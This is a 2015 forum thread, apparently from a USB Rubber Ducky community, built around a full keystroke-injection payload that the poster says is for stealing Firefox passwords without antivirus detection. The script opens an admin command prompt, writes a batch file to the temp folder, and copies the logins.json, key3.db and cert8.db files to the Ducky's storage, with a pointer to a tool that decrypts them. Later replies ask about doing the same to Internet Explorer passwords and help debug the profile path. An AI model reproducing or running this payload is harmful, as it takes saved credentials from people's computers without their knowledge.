shamwow Posted June 2, 2015 Share Posted June 2, 2015 (edited) This is for stealing firefox passwords using just Batch because it is not detected by AV. If someone could make Tutorial on how to make a Batch file to steal Internet Explorer passwords using only Batch or Powershell without triggering AV i would appreciate it. For this you need the Twin Duck firmware. You also need to label your ducky drive as the word "DUCKY". DEFAULT_DELAY 75 DELAY 3000 REM get a cmd prompt this way because it's admin: CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 REM the admin part. CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat contents STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "ducky"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto while1 ENTER STRING :break ENTER REM REM FINALLY COPY THE FIREFOX STUFF: STRING mkdir %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\ ENTER CONTROL z ENTER STRING DuckyWait.bat ENTER This is not needed but is the .bat file that the Duck creates in the Temp directory. :while1 for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d if Exist %myd% ( goto break ) timeout /t 30 goto while1 :break mkdir %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\ To open and view the passwords just download Passwordfox.exe from the nirsoft site http://www.nirsoft.net/toolsdownload/passwordfox.zip Manually select the profile folder that just got created in the Duck inside the new Firefox directory. Edited July 22, 2015 by shamwow Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 20, 2015 Share Posted June 20, 2015 This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site; http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to preform the right operations. Quote Link to comment Share on other sites More sharing options...
shamwow Posted July 4, 2015 Author Share Posted July 4, 2015 (edited) This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site; http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to preform the right operations. in windows 7, i can get internet explorer 7, 8, 9 and 10 passwords. Edited July 22, 2015 by shamwow Quote Link to comment Share on other sites More sharing options...
MikeVazovsky Posted July 15, 2015 Share Posted July 15, 2015 Do you know on what algorithm can decipher passwords? I want to write your own C # program Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 15, 2015 Share Posted July 15, 2015 (edited) The only "algorithim" that can crack passwords is called a "brute force". If you want to do it in C# you will have to learn about the crypto api (is not as scary as it sounds, buy a data security book for C#, the most current one, will be a little bit old), and you will also have to learn how brute force algorithms work. Think like the odometer in your car. I tried a while back, I am thinking one would get better performance out of a C++ program however. You see, encryption of passwords is made via a one way hash, so there is no reversing it unless you have some Q-bits (like that will ever happen...). Brute force is guessing all possible outcomes. Although you could also do a wordlist crack, is essentially the same thing, except slightly more efficient. Learn this from my trials, threads are very inefficient to load up, so they can slow things down. Edited July 15, 2015 by overwraith Quote Link to comment Share on other sites More sharing options...
MikeVazovsky Posted July 15, 2015 Share Posted July 15, 2015 oh,no, you got me wrong, I want to learn how to decipher the algorithm password if I know: logins.json, key3.db and cert8.db (as well as it does passwodfox) Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 15, 2015 Share Posted July 15, 2015 So it is more of a formatting thing than an actual cracking program? I don't know somebody else might know. Quote Link to comment Share on other sites More sharing options...
MikeVazovsky Posted July 16, 2015 Share Posted July 16, 2015 I have a problem the %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\ opens well, but the way %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default wrote that he could not find, even though I have a folder gofsocms.default. How to solve it? Quote Link to comment Share on other sites More sharing options...
shamwow Posted July 22, 2015 Author Share Posted July 22, 2015 (edited) I have a problem the %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\ opens well, but the way %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default wrote that he could not find, even though I have a folder gofsocms.default. How to solve it? for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ is a batch script command. you need to include the whole line. also, first label your duck drive to the word "ducky" for the payload to work. Edited July 22, 2015 by shamwow Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.